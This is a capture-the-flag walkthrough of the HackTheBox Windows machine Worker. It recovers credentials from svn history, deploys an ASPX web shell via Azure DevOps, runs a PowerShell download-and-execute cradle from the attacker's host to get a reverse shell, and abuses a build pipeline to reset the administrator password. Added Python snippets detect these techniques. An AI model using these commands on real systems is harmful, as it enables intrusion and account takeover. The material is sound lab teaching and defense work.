Worker HackTheBox WalkThrough

This is the Worker HackTheBox walkthrough. In this writeup I demonstrate step by step how I rooted the Worker HTB box. Before starting, some background on the box: it is a Windows machine with IP address 10.10.10.203, rated medium difficulty by its maker.

Before starting, connect your PC to the VPN and verify connectivity by pinging the IP 10.10.10.203. If all goes well, it is time to start hacking.

As usual, I started by scanning the box. Scanning gives us an idea of how to proceed further: it grabs the banners of the services running on the different ports, and sometimes it doubles as a vulnerability scan. Nmap (a port scanner) gave the following result:

Scanning

$ nmap -sC -sV -T4 -oN worker_scan 10.10.10.203

Nmap port scan during Worker HackTheBox WalkThrough

Nmap discovered that ports 80 and 3690 are open: a Microsoft IIS web server is running on port 80 and the svnserve service on port 3690. Browsing to http://10.10.10.203/ showed the default Microsoft IIS page. I looked through the page source for hyperlinks to other pages, but found nothing interesting except a link to Microsoft's official site. So I left it there and moved on to enumerate port 3690.

I did not know anything about the svnserve service, but after some googling I found this interesting article. It explains the svn client, a tool used to access an SVN server remotely. After playing with this tool for some time I found a subdomain, dimension.worker.htb, and a file, deploy.ps1.

$ svn list --verbose -r 2 svn://10.10.10.203/

Listing the content of svn directory in Worker HackTheBox WalkThrough

After some more enumeration I found a way to dump the content of the file deploy.ps1.

$ svn diff -r 2 svn://10.10.10.203/

Dumping the content of deploy.ps1 during Worker HackTheBox WalkThrough

This revealed a credential, nathen : wendel98, and a new subdomain, devops.worker.htb. I did not know whose credential it was, but as usual I added it to my notes; it might be useful later. Now we have two subdomains, dimension.worker.htb and devops.worker.htb. I added both of them to my hosts file.
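The lesson for the repository's owners is that a credential committed in an early revision stays recoverable through the history even after the file is removed. The following added example (not part of the original writeup) scans the text of an `svn diff` for added lines that look like hard-coded secrets; the diff body is a constructed stand-in for the real deploy.ps1, using only the credential the walkthrough recovered.

```python
import re
from typing import List, Tuple

# Constructed sample of `svn diff -r 2` output. The real deploy.ps1 body is not
# reproduced; only the credential the walkthrough recovered (nathen / wendel98)
# appears, inside an invented PowerShell script.
SAMPLE_DIFF = """\
Index: deploy.ps1
===================================================================
--- deploy.ps1\t(nonexistent)
+++ deploy.ps1\t(revision 2)
@@ -0,0 +1,5 @@
+$user = "nathen"
+$pass = "wendel98"
+$secure = ConvertTo-SecureString -String $pass -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential($user, $secure)
+Invoke-Command -ComputerName devops.worker.htb -Credential $cred -ScriptBlock { Get-Date }
"""

# Added line assigning a string literal to a variable whose name suggests a secret.
SECRET_VAR = re.compile(r'^\+\s*\$\w*(pass|pwd|secret|token|key)\w*\s*=\s*["\'].+?["\']', re.I)
# Added line passing a string literal to a parameter that takes a secret.
SECRET_PARAM = re.compile(r'^\+.*-(Password|ApiKey|Token)\s+["\'].+?["\']', re.I)
HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)")

def scan_svn_diff(diff_text: str) -> List[Tuple[str, int, str]]:
    """Return (file, line number in the new revision, offending line) for every
    added line that looks like a hard-coded secret."""
    findings, current_file, new_line, in_hunk = [], None, 0, False
    for raw in diff_text.splitlines():
        if raw.startswith("Index: "):
            current_file, in_hunk = raw[len("Index: "):].strip(), False
        elif raw.startswith("@@"):
            m = HUNK.match(raw)
            new_line, in_hunk = (int(m.group(1)) - 1 if m else 0), True
        elif not in_hunk or raw.startswith(("+++", "---")):
            continue
        elif raw.startswith("+"):
            new_line += 1
            if SECRET_VAR.match(raw) or SECRET_PARAM.match(raw):
                findings.append((current_file, new_line, raw[1:].strip()))
        elif not raw.startswith("-"):
            new_line += 1  # an unchanged context line also advances the new side
    return findings

if __name__ == "__main__":
    for path, line, text in scan_svn_diff(SAMPLE_DIFF):
        print(f"{path}:{line}: possible hard-coded secret: {text}")
```

Run it over `svn diff -r N` for every revision (or a `git log -p` dump, which uses the same hunk format) to find secrets that were later deleted but never rotated.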

Modified Hosts File

$ cat /etc/hosts

My hosts file after modification

Browsing to http://dimension.worker.htb/#work revealed some more subdomains: alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb. I added them all to my hosts file, so my final hosts file looks like the one below.

Modified Hosts File

$ cat /etc/hosts

Hosts file after modification

Browsing to alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb turned up nothing interesting on any of them. So I left them and went to http://devops.worker.htb, which presented a login page like the one on a Tomcat web server. I tried to log in with the credential nathen:wendel98 and succeeded.

Login into devops.worker.htb domain during Worker HackTheBox WalkThrough

After logging in I found that it is a Microsoft Azure DevOps instance. For more information about Microsoft Azure, you can watch this video. It is a cloud-based service that lets us create and deploy our own packages by uploading them directly to the server.

We will take advantage of this feature of uploading and deploying any package: we will upload our command shell and deploy it from a branch that we create.

So, to get a shell back to my PC, I followed these steps.

1. Created a Branch named MyBranch1 in Repos.

2. Uploaded the cmdasp.aspx command shell into the spectral folder inside the branch MyBranch1.

The command shell can be found at directory /usr/share/webshells/aspx/ in Kali Linux.

3. Then committed, created a pull request, and finally approved it.

Once our package is approved, it can be accessed at http://spectral.worker.htb/cmdasp.aspx.

Since we upload our command shell into the spectral directory, it is served at the subdomain spectral.worker.htb. Had we used some other folder such as lens to upload our shell, it would be accessible at the subdomain lens.worker.htb.

I did exactly the steps described above.

Uploading & Deploying Package

1. Log in to DevOps using the credential nathen : wendel98.

2. Click on SmartHotel360.

Selecting SmartHotel360 to list its content in Worker HackTheBox WalkThrough

3. In the left pane of the window, click the Branches option under the Repos menu, then click New Branch to create a new branch.

Selecting branch to create new branch in Worker HackTheBox WalkThrough

4. Provide the name MyBranch1 and click Create branch.

Naming the branch to MyBranch1 in Worker HackTheBox WalkThrough

5. Once the branch is created, click it to open all the files inside it.

Selecting the Branch

6. Upload the cmdasp.aspx command shell by choosing Upload files, then click the Commit button to commit the upload.

Selecting Upload to upload our aspx command shell in Worker HackTheBox WalkThrough

7. Once the commit has succeeded, click Create a pull request for the commit.

Creating a pull request in Worker HackTheBox WalkThrough

8. Enter anything as the Title and choose Nathalie Henley as the reviewer. In addition, choose whichever of the two Work Items you want and click Create.

Giving title to the new Pull Requests in HackTheBox Worker Writeup

9. Click Approve, Complete and then Complete Merge. Before clicking Complete Merge, make sure to uncheck the second option, Delete MyBranch1 after merging.

Window showing approval button in Worker HackTheBox WalkThrough

After Complete Merge you will get the following message.

Worker screen after deploying the aspx shell in hackthebox walkthrough

Now all is set. Just go to the URL http://spectral.worker.htb/cmdasp.aspx to access the command shell and confirm the host by executing whoami && ipconfig.

Command shell obtained by accessing the uploaded shell through its URL, and checking the host

Now we have remote command execution. It is time to get a reverse shell in our terminal. There are multiple ways to get a shell; I used Invoke-PowerShellTcp.ps1 from here.

Getting Shell through RCE

To get a shell I did the following:

1. Downloaded the shell from the URL above.

2. Changed the IP address and port number inside the Invoke-PowerShellTcp.ps1 file to my tun0 IP and listening port.

3. Started a netcat listener locally.

4. Started a Python HTTP server locally.

5. Executed the following command in the command shell at http://spectral.worker.htb/cmdasp.aspx:

$ powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"

Note: If you do not get a command shell, refresh the page http://spectral.worker.htb/cmdasp.aspx four or five times, since the deployment may take some time.
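From the defender's side, both stages above leave a distinctive trace in process-creation telemetry: an IIS worker process (w3wp.exe) spawning a shell, and an application-pool identity running PowerShell with an execution-policy bypass and a download-and-execute cradle. The following added example (not from the original writeup) runs those three checks over constructed Sysmon-style events; the PowerShell command line is the one used above, all other field values are invented.

```python
import json
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (Sysmon Event ID 1 shape, trimmed to four
# fields). The PowerShell command line is the one from the walkthrough; every
# other value is invented for this example.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "spectral"', "User": r"IIS APPPOOL\spectral"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami && ipconfig", "User": r"IIS APPPOOL\spectral"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -exec bypass -C \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')\"",
     "User": r"IIS APPPOOL\spectral"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "User": r"WORKER\robisl"},
])

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I)
EXECUTE = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)
BYPASS = re.compile(r"-(exec|ep|executionpolicy)\s+bypass", re.I)

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty if nothing fires)."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd, hits = event["CommandLine"], []
    if parent == "w3wp.exe" and image in SHELLS:
        hits.append("iis_worker_spawned_shell")      # web shell / RCE in an IIS app
    if event["User"].upper().startswith("IIS APPPOOL\\") and image in SHELLS and BYPASS.search(cmd):
        hits.append("apppool_powershell_bypass")     # app-pool identity evading policy
    if image in ("powershell.exe", "pwsh.exe") and FETCH.search(cmd) and EXECUTE.search(cmd):
        hits.append("download_cradle")               # fetch from the network, pipe to IEX
    return hits

def detect(jsonl: str) -> List[Tuple[str, List[str]]]:
    """Run classify() over newline-delimited JSON events and keep only the alerts."""
    results = []
    for line in filter(str.strip, jsonl.splitlines()):
        event = json.loads(line)
        if hits := classify(event):
            results.append((ntpath.basename(event["Image"]).lower(), hits))
    return results
```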

Getting User shell on terminal by command execution in Worker HackTheBox WalkThrough

We got a shell. After some initial enumeration I found a drive W on the worker machine and, inside the directory W:\svnrepos\www\conf\, a file named passwd. It contains the credentials of all the SVN users, including the credential of the user robisl, who also has a profile in the C:\Users\ directory. The credential is robisl:wolves11.

Password file discovered on the W drive during Worker HackTheBox WalkThrough

I tried to log in remotely with the credential robisl:wolves11 using evil-winrm (a Windows Remote Management tool), and logged in successfully.

Login using Evil-Winrm

$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Login into Worker HackTheBox machine using evil-winrm tool

Capture User Flag

$ type ..\Desktop\user.txt

Worker HackTheBox User Flag captured during walkthrough

Privilege Escalation

To escalate privileges I did the following:

1. Logged in to devops.worker.htb using the creds robisl : wolves11.

2. Created a pipeline.

3. Then chose "Azure Repos Git" for importing code.

4. Clicked the repository PartsUnlimited, then chose Starter pipeline as the platform.

5. Finally inserted a custom command into the script to change the administrator password, then saved and ran the pipeline to execute the command.

Following the above steps:

Creating Pipeline & Running Script

1. Click on PartsUnlimited

Selecting PartsUnlimited to list its content in Worker HackTheBox

2. In the left pane, click the Pipelines option.

Selecting Pipeline to list its content

3. Then New pipeline

Creating New Pipeline in Worker machine to perform privilege escalation

4. Choose Azure Repos Git

Selecting the source to obtain code for execution in Worker HackTheBox WalkThrough

5. Click on PartsUnlimited

Selecting the repository PartsUnlimited

6. Select Starter pipeline as the platform.

Selecting the Starter Pipeline platform to execute our command

7. Edit the code by adding net user administrator ThisIsNewPASSWD@123, then click Save and run. The cmd command we introduced into the azure-pipelines.yml file will change the administrator password to ThisIsNewPASSWD@123.

Editing the script to introduce our custom cmd command in YAML file

8. Type the name MyPipeline in the review dialog box, then Save and run.

Save and Run

After a successful run you will see the following window.

Finalizing the setup of CI with Azure Pipelines

The administrator password is now changed. We can log in remotely to the worker machine using evil-winrm with the credential administrator : ThisIsNewPASSWD@123.

$ evil-winrm -i 10.10.10.203 -u administrator -p ThisIsNewPASSWD@123

Login remotely to administrator account using Evil-Winrm tool
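Because the `net user` step changed the local administrator password on the box, the pipeline's script steps evidently ran on an agent on that host with administrative rights, and any user allowed to create a pipeline could run commands there. The following added example (not from the original writeup) is the kind of review-time check a repository owner could run over a proposed azure-pipelines.yml: it pulls out inline script steps with a small line-based parser and flags commands that alter local accounts or fetch-and-run code. The YAML is a constructed copy of the Starter pipeline skeleton with the walkthrough's line inserted.

```python
import re
from typing import List, Tuple

# Constructed azure-pipelines.yml: the Starter pipeline skeleton with the
# walkthrough's `net user` line inserted into the multi-line script step.
SAMPLE_PIPELINE = """\
trigger:
- master

pool:
  name: Default   # constructed: a self-hosted agent pool

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    net user administrator ThisIsNewPASSWD@123
  displayName: 'Run a multi-line script'
"""

STEP_KEY = re.compile(r"^(\s*)-\s*(script|bash|powershell|pwsh|cmd):\s*(.*)$")
# Commands that alter local accounts or fetch-and-run code on the agent host.
SENSITIVE = re.compile(r"\bnet\s+(user|localgroup)\b|New-LocalUser|Set-LocalUser|"
                       r"Add-LocalGroupMember|Invoke-Expression|\bIEX\b", re.I)

def script_steps(yaml_text: str) -> List[List[str]]:
    """Line-based extraction of inline script steps (no YAML library needed);
    each step is returned as its list of non-empty command lines."""
    lines, steps, i = yaml_text.splitlines(), [], 0
    while i < len(lines):
        m = STEP_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        value = m.group(3).strip()
        if value not in ("|", "|-", ">", ">-"):      # single-line script value
            steps.append([value])
            continue
        body, block_indent = [], None               # block scalar: read until dedent
        while i < len(lines):
            line = lines[i]
            if line.strip():
                indent = len(line) - len(line.lstrip())
                block_indent = indent if block_indent is None else block_indent
                if indent < block_indent:
                    break
                body.append(line.strip())
            i += 1
        steps.append(body)
    return steps

def audit_pipeline(yaml_text: str) -> List[Tuple[int, str]]:
    """Return (script step number, command) for every line that needs review."""
    return [(n, cmd) for n, body in enumerate(script_steps(yaml_text), 1)
            for cmd in body if SENSITIVE.search(cmd)]
```

A text check like this only catches the obvious cases; the durable fix is to restrict who may queue builds on a self-hosted agent pool and to run that agent as a low-privilege account.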

Capture Root Flag

$ type ..\Desktop\root.txt

Worker HackTheBox machine root flag captured during walkthrough

This is how I rooted Worker on HackTheBox. I learnt a lot from this box, and I hope you have also learnt something new from it. Thanks for reading this writeup. For any suggestions or queries related to the walkthrough, feel free to contact us at [email protected].

For more HackTheBox walkthroughs, keep visiting ethicalhacs.com.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/